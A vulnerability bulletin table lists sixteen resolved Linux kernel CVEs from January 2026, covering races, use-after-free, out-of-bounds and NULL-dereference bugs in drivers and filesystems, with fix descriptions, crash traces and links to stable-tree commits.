| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix XDP_TX path For XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not correct. __bnxt_poll_work() -> bnxt_rx_pkt() -> bnxt_rx_xdp() may be looping within NAPI and some event flags may be set in earlier iterations. In particular, if BNXT_TX_EVENT is set earlier indicating some XDP_TX packets are ready and pending, it will be cleared if it is XDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we successfully call __bnxt_xmit_xdp(). But if the TX ring has no more room, the flag will not be set. This will cause the TX producer to be ahead but the driver will not hit the TX doorbell. For multi-buf XDP_TX, there is no need to clear the event flags and set BNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in bnxt_rx_pkt(). The visible symptom of this is that the RX ring associated with the TX XDP ring will eventually become empty and all packets will be dropped. Because this condition will cause the driver to not refill the RX ring seeing that the TX ring has forever pending XDP_TX packets. The fix is to only clear BNXT_RX_EVENT when we have successfully called __bnxt_xmit_xdp(). | 2026-01-13 | not yet calculated | CVE-2025-68770 | https://git.kernel.org/stable/c/4b83902a1e67ff327ab5c6c65021a03e72c081d6 https://git.kernel.org/stable/c/f17e0c1208485b24d61271bc1ddc8f2087e71561 https://git.kernel.org/stable/c/0373d5c387f24de749cc22e694a14b3a7c7eb515 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix kernel BUG in ocfs2_find_victim_chain syzbot reported a kernel BUG in ocfs2_find_victim_chain() because the `cl_next_free_rec` field of the allocation chain list (next free slot in the chain list) is 0, triggering the BUG_ON(!cl->cl_next_free_rec) condition in ocfs2_find_victim_chain() and panicking the kernel. To fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(), just before calling ocfs2_find_victim_chain(), the code block in it being executed when either of the following conditions is true: 1. `cl_next_free_rec` is equal to 0, indicating that there are no free chains in the allocation chain list 2. `cl_next_free_rec` is greater than `cl_count` (the total number of chains in the allocation chain list) Either of them being true is indicative of the fact that there are no chains left for usage. This is addressed using ocfs2_error(), which prints the error log for debugging purposes, rather than panicking the kernel. | 2026-01-13 | not yet calculated | CVE-2025-68771 | https://git.kernel.org/stable/c/1f77e5cd563e6387fdf3bb714fcda36cd88ac5e7 https://git.kernel.org/stable/c/d0fd1f732ea8063cecd07a3879b7d815c7ee71ed https://git.kernel.org/stable/c/b08a33d5f80efe6979a6e8f905c1a898910c21dd https://git.kernel.org/stable/c/96f1b074c98c20f55a3b23d2ab44d9fb0f619869 https://git.kernel.org/stable/c/e24aedae71652d4119049f1fbef6532ccbe3966d https://git.kernel.org/stable/c/7acc0390e0dd7474c4451d05465a677d55ad4268 https://git.kernel.org/stable/c/039bef30e320827bac8990c9f29d2a68cd8adb5f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid updating compression context during writeback Bai, Shuangpeng <sjb7183@psu.edu> reported a bug as below: Oops: divide error: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857 Call Trace: <TASK> f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline] __f2fs_write_data_pages fs/f2fs/data.c:3290 [inline] f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317 do_writepages+0x38e/0x640 mm/page-writeback.c:2634 filemap_fdatawrite_wbc mm/filemap.c:386 [inline] __filemap_fdatawrite_range mm/filemap.c:419 [inline] file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794 f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294 generic_write_sync include/linux/fs.h:3043 [inline] f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x7e9/0xe00 fs/read_write.c:686 ksys_write+0x19d/0x2d0 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The bug was triggered w/ below race condition: fsync setattr ioctl - f2fs_do_sync_file - file_write_and_wait_range - f2fs_write_cache_pages : inode is non-compressed : cc.cluster_size = F2FS_I(inode)->i_cluster_size = 0 - tag_pages_for_writeback - f2fs_setattr - truncate_setsize - f2fs_truncate - f2fs_fileattr_set - f2fs_setflags_common - set_compress_context : F2FS_I(inode)->i_cluster_size = 4 : set_inode_flag(inode, FI_COMPRESSED_FILE) - f2fs_compressed_file : return true - f2fs_all_cluster_page_ready : "pgidx % cc->cluster_size" trigger dividing 0 issue Let's change as below to fix this issue: - introduce a new atomic type variable .writeback in structure f2fs_inode_info to track the number of threads which call f2fs_write_cache_pages(). - use .i_sem lock to protect .writeback update. - check .writeback before updating compression context in f2fs_setflags_common() to avoid race w/ ->writepages. | 2026-01-13 | not yet calculated | CVE-2025-68772 | https://git.kernel.org/stable/c/ad26bfbc085c939b5dca77ff8c14798c06d151c4 https://git.kernel.org/stable/c/bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0 https://git.kernel.org/stable/c/0bf1a02494c7eb5bd43445de4c83c8592e02c4bf https://git.kernel.org/stable/c/0df713a9c082a474c8b0bcf670edc8e98461d5a0 https://git.kernel.org/stable/c/10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fsl-cpm: Check length parity before switching to 16 bit mode Commit fc96ec826bce ("spi: fsl-cpm: Use 16 bit mode for large transfers with even size") failed to make sure that the size is really even before switching to 16 bit mode. Until recently the problem went unnoticed because kernfs uses a pre-allocated bounce buffer of size PAGE_SIZE for reading EEPROM. But commit 8ad6249c51d0 ("eeprom: at25: convert to spi-mem API") introduced an additional dynamically allocated bounce buffer whose size is exactly the size of the transfer, leading to a buffer overrun in the fsl-cpm driver when that size is odd. Add the missing length parity verification and remain in 8 bit mode when the length is not even. | 2026-01-13 | not yet calculated | CVE-2025-68773 | https://git.kernel.org/stable/c/c8f1d35076b78df61ace737e41cc1f4b7b63236c https://git.kernel.org/stable/c/9c34a4a2ead00979d203a8c16bea87f0ef5291d8 https://git.kernel.org/stable/c/837a23a11e0f734f096c7c7b0778d0e625e3dc87 https://git.kernel.org/stable/c/3dd6d01384823e1bd8602873153d6fc4337ac4fe https://git.kernel.org/stable/c/743cebcbd1b2609ec5057ab474979cef73d1b681 https://git.kernel.org/stable/c/be0b613198e6bfa104ad520397cab82ad3ec1771 https://git.kernel.org/stable/c/1417927df8049a0194933861e9b098669a95c762 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix missing hfs_bnode_get() in __hfs_bnode_create When sync() and link() are called concurrently, both threads may enter hfs_bnode_find() without finding the node in the hash table and proceed to create it. Thread A: hfsplus_write_inode() -> hfsplus_write_system_inode() -> hfs_btree_write() -> hfs_bnode_find(tree, 0) -> __hfs_bnode_create(tree, 0) Thread B: hfsplus_create_cat() -> hfs_brec_insert() -> hfs_bnode_split() -> hfs_bmap_alloc() -> hfs_bnode_find(tree, 0) -> __hfs_bnode_create(tree, 0) In this case, thread A creates the bnode, sets refcnt=1, and hashes it. Thread B also tries to create the same bnode, notices it has already been inserted, drops its own instance, and uses the hashed one without getting the node. ``` node2 = hfs_bnode_findhash(tree, cnid); if (!node2) { <- Thread A hash = hfs_bnode_hash(cnid); node->next_hash = tree->node_hash[hash]; tree->node_hash[hash] = node; tree->node_hash_cnt++; } else { <- Thread B spin_unlock(&tree->hash_lock); kfree(node); wait_event(node2->lock_wq, !test_bit(HFS_BNODE_NEW, &node2->flags)); return node2; } ``` However, hfs_bnode_find() requires each call to take a reference. Here both threads end up setting refcnt=1. When they later put the node, this triggers: BUG_ON(!atomic_read(&node->refcnt)) In this scenario, Thread B in fact finds the node in the hash table rather than creating a new one, and thus must take a reference. Fix this by calling hfs_bnode_get() when reusing a bnode newly created by another thread to ensure the refcount is updated correctly. A similar bug was fixed in HFS long ago in commit a9dc087fd3c4 ("fix missing hfs_bnode_get() in __hfs_bnode_create") but the same issue remained in HFS+ until now. | 2026-01-13 | not yet calculated | CVE-2025-68774 | https://git.kernel.org/stable/c/3b0fc7af50b896d0f3d104e70787ba1973bc0b56 https://git.kernel.org/stable/c/39e149d58ef4d7883cbf87448d39d51292fd342d https://git.kernel.org/stable/c/b68dc4134b18a3922cd33439ec614aad4172bc86 https://git.kernel.org/stable/c/b9d1c6bb5f19460074ce9862cb80be86b5fb0a50 https://git.kernel.org/stable/c/457f795e7abd7770de10216d7f9994a3f12a56d6 https://git.kernel.org/stable/c/5882e7c8cdbb5e254a69628b780acff89c78071e https://git.kernel.org/stable/c/152af114287851583cf7e0abc10129941f19466a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/handshake: duplicate handshake cancellations leak socket When a handshake request is cancelled it is removed from the handshake_net->hn_requests list, but it is still present in the handshake_rhashtbl until it is destroyed. If a second cancellation request arrives for the same handshake request, then remove_pending() will return false... and assuming HANDSHAKE_F_REQ_COMPLETED isn't set in req->hr_flags, we'll continue processing through the out_true label, where we put another reference on the sock and a refcount underflow occurs. This can happen for example if a handshake times out - particularly if the SUNRPC client sends the AUTH_TLS probe to the server but doesn't follow it up with the ClientHello due to a problem with tlshd. When the timeout is hit on the server, the server will send a FIN, which triggers a cancellation request via xs_reset_transport(). When the timeout is hit on the client, another cancellation request happens via xs_tls_handshake_sync(). Add a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel path so duplicate cancels can be detected. | 2026-01-13 | not yet calculated | CVE-2025-68775 | https://git.kernel.org/stable/c/011ae80c49d9bfa5b4336f8bd387cd25c7593663 https://git.kernel.org/stable/c/e1641177e7fb48a0a5a06658d4aab51da6656659 https://git.kernel.org/stable/c/3c330f1dee3cd92b57e19b9d21dc8ce5970b09be https://git.kernel.org/stable/c/15564bd67e2975002f2a8e9defee33e321d3183f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() prp_get_untagged_frame() calls __pskb_copy() to create frame->skb_std but doesn't check if the allocation failed. If __pskb_copy() returns NULL, skb_clone() is called with a NULL pointer, causing a crash: Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f] CPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041 Code: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 <43> 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c RSP: 0018:ffffc9000d00f200 EFLAGS: 00010207 RAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480 RDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000 RBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee R10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000 R13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00 FS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0 Call Trace: <TASK> hsr_forward_do net/hsr/hsr_forward.c:-1 [inline] hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741 hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84 __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966 __netif_receive_skb_one_core net/core/dev.c:6077 [inline] __netif_receive_skb+0x72/0x380 net/core/dev.c:6192 netif_receive_skb_internal net/core/dev.c:6278 [inline] netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337 tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485 tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953 tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x5c9/0xb30 fs/read_write.c:686 ksys_write+0x145/0x250 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f0449f8e1ff Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48 RSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff RDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8 RBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000 R10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001 R13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003 </TASK> Add a NULL check immediately after __pskb_copy() to handle allocation failures gracefully. | 2026-01-13 | not yet calculated | CVE-2025-68776 | https://git.kernel.org/stable/c/3ce95a57d8a1f0e20b637cdeddaaed81831ca819 https://git.kernel.org/stable/c/c851e43b88b40bb7c20176c51cbf4f8c8d960dd9 https://git.kernel.org/stable/c/7be6d25f4d974e44918ba3a5d58ebb9d36879087 https://git.kernel.org/stable/c/8f289fa12926aae44347ca7d490e216555d8f255 https://git.kernel.org/stable/c/1742974c24a9c1f1fd2e5edca0cbaccb720b397a https://git.kernel.org/stable/c/6220d38a08f8837575cd8f830928b49a3a5a5095 https://git.kernel.org/stable/c/188e0fa5a679570ea35474575e724d8211423d17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: ti_am335x_tsc - fix off-by-one error in wire_order validation The current validation 'wire_order[i] > ARRAY_SIZE(config_pins)' allows wire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds access when used as index in 'config_pins[wire_order[i]]'. Since config_pins has 4 elements (indices 0-3), the valid range for wire_order should be 0-3. Fix the off-by-one error by using >= instead of > in the validation check. | 2026-01-13 | not yet calculated | CVE-2025-68777 | https://git.kernel.org/stable/c/a7ff2360431561b56f559d3a628d1f096048d178 https://git.kernel.org/stable/c/136abe173a3cc2951d70c6e51fe7abdbadbb204b https://git.kernel.org/stable/c/08c0b561823a7026364efb38ed7f4a3af48ccfcd https://git.kernel.org/stable/c/bf95ec55805828c4f2b5241fb6b0c12388548570 https://git.kernel.org/stable/c/84e4d3543168912549271b34261f5e0f94952d6e https://git.kernel.org/stable/c/40e3042de43ffa0017a8460ff9b4cad7b8c7cb96 https://git.kernel.org/stable/c/248d3a73a0167dce15ba100477c3e778c4787178 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't log conflicting inode if it's a dir moved in the current transaction We can't log a conflicting inode if it's a directory and it was moved from one parent directory to another parent directory in the current transaction, as this can result in an attempt to have a directory with two hard links during log replay, one for the old parent directory and another for the new parent directory. The following scenario triggers that issue: 1) We have directories "dir1" and "dir2" created in a past transaction. Directory "dir1" has inode A as its parent directory; 2) We move "dir1" to some other directory; 3) We create a file with the name "dir1" in directory inode A; 4) We fsync the new file. This results in logging the inode of the new file and the inode for the directory "dir1" that was previously moved in the current transaction. So the log tree has the INODE_REF item for the new location of "dir1"; 5) We move the new file to some other directory. This results in updating the log tree to include the new INODE_REF for the new location of the file and removes the INODE_REF for the old location. This happens during the rename when we call btrfs_log_new_name(); 6) We fsync the file, and that persists the log tree changes done in the previous step (btrfs_log_new_name() only updates the log tree in memory); 7) We have a power failure; 8) Next time the fs is mounted, log replay happens and when processing the inode for directory "dir1" we find a new INODE_REF and add that link, but we don't remove the old link of the inode since we have not logged the old parent directory of the directory inode "dir1". As a result after log replay finishes when we trigger writeback of the subvolume tree's extent buffers, the tree checker will detect that we have a directory with a hard link count of 2 and we get a mount failure. The errors and stack traces reported in dmesg/syslog are like this: [ 3845.729764] BTRFS info (device dm-0): start tree-log replay [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c [ 3845.731236] memcg:ffff9264c02f4e00 [ 3845.731751] aops:btree_aops [btrfs] ino:1 [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff) [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8 [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00 [ 3845.735305] page dumped because: eb page dump [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5 [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701 [ 3845.737792] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160 [ 3845.737794] inode generation 3 transid 9 size 16 nbytes 16384 [ 3845.737795] block group 0 mode 40755 links 1 uid 0 gid 0 [ 3845.737797] rdev 0 sequence 2 flags 0x0 [ 3845.737798] atime 1764259517.0 [ 3845.737800] ctime 1764259517.572889464 [ 3845.737801] mtime 1764259517.572889464 [ 3845.737802] otime 1764259517.0 [ 3845.737803] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12 [ 3845.737805] index 0 name_len 2 [ 3845.737807] item 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34 [ 3845.737808] location key (257 1 0) type 2 [ 3845.737810] transid 9 data_len 0 name_len 4 [ 3845.737811] item 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34 [ 3845.737813] location key (258 1 0) type 2 [ 3845.737814] transid 9 data_len 0 name_len 4 [ 3845.737815] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34 [ 3845.737816] location key (257 1 0) type 2 [ ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-68778 | https://git.kernel.org/stable/c/d64f3834dffef80f0a9185a037617a54ed7f4bd2 https://git.kernel.org/stable/c/7359e1d39c78816ecbdb0cb4e93975794ce53973 https://git.kernel.org/stable/c/d478f50727c3ee46d0359f0d2ae114f70191816e https://git.kernel.org/stable/c/a35788ddf8df65837897ecbb0ddb2896b863159e https://git.kernel.org/stable/c/266273eaf4d99475f1ae57f687b3e42bc71ec6f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Avoid unregistering PSP twice PSP is unregistered twice in: _mlx5e_remove -> mlx5e_psp_unregister mlx5e_nic_cleanup -> mlx5e_psp_unregister This leads to a refcount underflow in some conditions: ------------[ cut here ]------------ refcount_t: underflow; use-after-free. WARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0 [...] mlx5e_psp_unregister+0x26/0x50 [mlx5_core] mlx5e_nic_cleanup+0x26/0x90 [mlx5_core] mlx5e_remove+0xe6/0x1f0 [mlx5_core] auxiliary_bus_remove+0x18/0x30 device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core] [...] Do not directly remove psp from the _mlx5e_remove path, the PSP cleanup happens as part of profile cleanup. | 2026-01-13 | not yet calculated | CVE-2025-68779 | https://git.kernel.org/stable/c/e12c912f92ccea671b514caf371f28485714bb4b https://git.kernel.org/stable/c/35e93736f69963337912594eb3951ab320b77521 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/deadline: only set free_cpus for online runqueues Commit 16b269436b72 ("sched/deadline: Modify cpudl::free_cpus to reflect rd->online") introduced the cpudl_set/clear_freecpu functions to allow the cpu_dl::free_cpus mask to be manipulated by the deadline scheduler class rq_on/offline callbacks so the mask would also reflect this state. Commit 9659e1eeee28 ("sched/deadline: Remove cpu_active_mask from cpudl_find()") removed the check of the cpu_active_mask to save some processing on the premise that the cpudl::free_cpus mask already reflected the runqueue online state. Unfortunately, there are cases where it is possible for the cpudl_clear function to set the free_cpus bit for a CPU when the deadline runqueue is offline. When this occurs while a CPU is connected to the default root domain the flag may retain the bad state after the CPU has been unplugged. Later, a different CPU that is transitioning through the default root domain may push a deadline task to the powered down CPU when cpudl_find sees its free_cpus bit is set. If this happens the task will not have the opportunity to run. One example is outlined here: https://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com Another occurs when the last deadline task is migrated from a CPU that has an offlined runqueue. The dequeue_task member of the deadline scheduler class will eventually call cpudl_clear and set the free_cpus bit for the CPU. This commit modifies the cpudl_clear function to be aware of the online state of the deadline runqueue so that the free_cpus mask can be updated appropriately. It is no longer necessary to manage the mask outside of the cpudl_set/clear functions so the cpudl_set/clear_freecpu functions are removed. In addition, since the free_cpus mask is now only updated under the cpudl lock the code was changed to use the non-atomic __cpumask functions. | 2026-01-13 | not yet calculated | CVE-2025-68780 | https://git.kernel.org/stable/c/9019e399684e3cc68c4a3f050e268f74d69c1317 https://git.kernel.org/stable/c/fb36846cbcc936954f2ad2bffdff13d16c0be08a https://git.kernel.org/stable/c/91e448e69aca4bb0ba2e998eb3e555644db7322b https://git.kernel.org/stable/c/dbc61834b0412435df21c71410562d933e4eba49 https://git.kernel.org/stable/c/3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8 https://git.kernel.org/stable/c/382748c05e58a9f1935f5a653c352422375566ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal The delayed work item otg_event is initialized in fsl_otg_conf() and scheduled under two conditions: 1. When a host controller binds to the OTG controller. 2. When the USB ID pin state changes (cable insertion/removal). A race condition occurs when the device is removed via fsl_otg_remove(): the fsl_otg instance may be freed while the delayed work is still pending or executing. This leads to use-after-free when the work function fsl_otg_event() accesses the already freed memory. The problematic scenario: (detach thread) | (delayed work) fsl_otg_remove() | kfree(fsl_otg_dev) //FREE| fsl_otg_event() | og = container_of(...) //USE | og-> //USE Fix this by calling disable_delayed_work_sync() in fsl_otg_remove() before deallocating the fsl_otg structure. This ensures the delayed work is properly canceled and completes execution prior to memory deallocation. This bug was identified through static analysis. | 2026-01-13 | not yet calculated | CVE-2025-68781 | https://git.kernel.org/stable/c/4476c73bbbb09b13a962176fca934b32d3954a2e https://git.kernel.org/stable/c/319f7a85b3c4e34ac2fe083eb146fe129a556317 https://git.kernel.org/stable/c/69f9a0701abc3d1f8225074c56c27e6c16a37222 https://git.kernel.org/stable/c/2e7c47e2eb3cfeadf78a1ccbac8492c60d508f23 https://git.kernel.org/stable/c/41ca62e3e21e48c2903b3b45e232cf4f2ff7434f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: Reset t_task_cdb pointer in error case If allocation of cmd->t_task_cdb fails, it remains NULL but is later dereferenced in the 'err' path. In case of error, reset NULL t_task_cdb value to point at the default fixed-size buffer. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-13 | not yet calculated | CVE-2025-68782 | https://git.kernel.org/stable/c/6cac97b12bdab04832e0416d049efcd0d48d303b https://git.kernel.org/stable/c/45fd86b444105c8bd07a763f58635c87e5dc7aea https://git.kernel.org/stable/c/8727663ded659aad55eef21e3864ebf5a4796a96 https://git.kernel.org/stable/c/0260ad551b0815eb788d47f32899fbcd65d6f128 https://git.kernel.org/stable/c/0d36db68fdb8a3325386fd9523b67735f944e1f3 https://git.kernel.org/stable/c/8edbb9e371af186b4cf40819dab65fafe109df4d https://git.kernel.org/stable/c/5053eab38a4c4543522d0c320c639c56a8b59908 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-mixer: us16x08: validate meter packet indices get_meter_levels_from_urb() parses the 64-byte meter packets sent by the device and fills the per-channel arrays meter_level[], comp_level[] and master_level[] in struct snd_us16x08_meter_store. Currently the function derives the channel index directly from the meter packet (MUB2(meter_urb, s) - 1) and uses it to index those arrays without validating the range. If the packet contains a negative or out-of-range channel number, the driver may write past the end of these arrays. Introduce a local channel variable and validate it before updating the arrays. We reject negative indices, limit meter_level[] and comp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[] updates with ARRAY_SIZE(master_level). | 2026-01-13 | not yet calculated | CVE-2025-68783 | https://git.kernel.org/stable/c/53461710a95e15ac1f6542450943a492ecf8e550 https://git.kernel.org/stable/c/2168866396bd28ec4f3c8da0fbc7d08b5bd4f053 https://git.kernel.org/stable/c/cde47f4ccad6751ac36b7471572ddf38ee91870c https://git.kernel.org/stable/c/2f21a7cbaaa93926f5be15bc095b9c57c35748d9 https://git.kernel.org/stable/c/a8ad320efb663be30b794e3dd3e829301c0d0ed3 https://git.kernel.org/stable/c/eaa95228b8a56c4880a182c0350d67922b22408f https://git.kernel.org/stable/c/5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix a UAF problem in xattr repair The xchk_setup_xattr_buf function can allocate a new value buffer, which means that any reference to ab->value before the call could become a dangling pointer. Fix this by moving an assignment to after the buffer setup. | 2026-01-13 | not yet calculated | CVE-2025-68784 | https://git.kernel.org/stable/c/1e2d3aa19c7962b9474b22893160cb460494c45f https://git.kernel.org/stable/c/d29ed9ff972afe17c215cab171761d7a15d7063f https://git.kernel.org/stable/c/5990fd756943836978ad184aac980e2b36ab7e01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: fix middle attribute validation in push_nsh() action The push_nsh() action structure looks like this: OVS_ACTION_ATTR_PUSH_NSH(OVS_KEY_ATTR_NSH(OVS_NSH_KEY_ATTR_BASE,...)) The outermost OVS_ACTION_ATTR_PUSH_NSH attribute is OK'ed by the nla_for_each_nested() inside __ovs_nla_copy_actions(). The innermost OVS_NSH_KEY_ATTR_BASE/MD1/MD2 are OK'ed by the nla_for_each_nested() inside nsh_key_put_from_nlattr(). But nothing checks if the attribute in the middle is OK. We don't even check that this attribute is the OVS_KEY_ATTR_NSH. We just do a double unwrap with a pair of nla_data() calls - first time directly while calling validate_push_nsh() and the second time as part of the nla_for_each_nested() macro, which isn't safe, potentially causing invalid memory access if the size of this attribute is incorrect. The failure may not be noticed during validation due to the larger netlink buffer, but causes trouble later during action execution where the buffer is allocated exactly to the size: BUG: KASAN: slab-out-of-bounds in nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch] Read of size 184 at addr ffff88816459a634 by task a.out/22624 CPU: 8 UID: 0 PID: 22624 6.18.0-rc7+ #115 PREEMPT(voluntary) Call Trace: <TASK> dump_stack_lvl+0x51/0x70 print_address_description.constprop.0+0x2c/0x390 kasan_report+0xdd/0x110 kasan_check_range+0x35/0x1b0 __asan_memcpy+0x20/0x60 nsh_hdr_from_nlattr+0x1dd/0x6a0 [openvswitch] push_nsh+0x82/0x120 [openvswitch] do_execute_actions+0x1405/0x2840 [openvswitch] ovs_execute_actions+0xd5/0x3b0 [openvswitch] ovs_packet_cmd_execute+0x949/0xdb0 [openvswitch] genl_family_rcv_msg_doit+0x1d6/0x2b0 genl_family_rcv_msg+0x336/0x580 genl_rcv_msg+0x9f/0x130 netlink_rcv_skb+0x11f/0x370 genl_rcv+0x24/0x40 netlink_unicast+0x73e/0xaa0 netlink_sendmsg+0x744/0xbf0 __sys_sendto+0x3d6/0x450 do_syscall_64+0x79/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> Let's add some checks that the attribute is properly sized and that it's the only attribute inside the action. Technically, there is no real reason for OVS_KEY_ATTR_NSH to be there, as we know that we're pushing an NSH header already; it just creates extra nesting, but that's how uAPI works today. So, keeping it as it is. | 2026-01-13 | not yet calculated | CVE-2025-68785 | https://git.kernel.org/stable/c/d0c135b8bbbcf92836068fd395bebeb7ae6c7bef https://git.kernel.org/stable/c/3bc2efff20a38b2c7ca18317649715df0dd62ced https://git.kernel.org/stable/c/1b569db9c2f28b599e40050524aae5f7332bc294 https://git.kernel.org/stable/c/10ffc558246f2c75619aedda0921906095e46702 https://git.kernel.org/stable/c/2ecfc4433acdb149eafd7fb22d7fd4adf90b25e9 https://git.kernel.org/stable/c/c999153bfb2d1d9b295b7010d920f2a7c6d7595f https://git.kernel.org/stable/c/5ace7ef87f059d68b5f50837ef3e8a1a4870c36e |
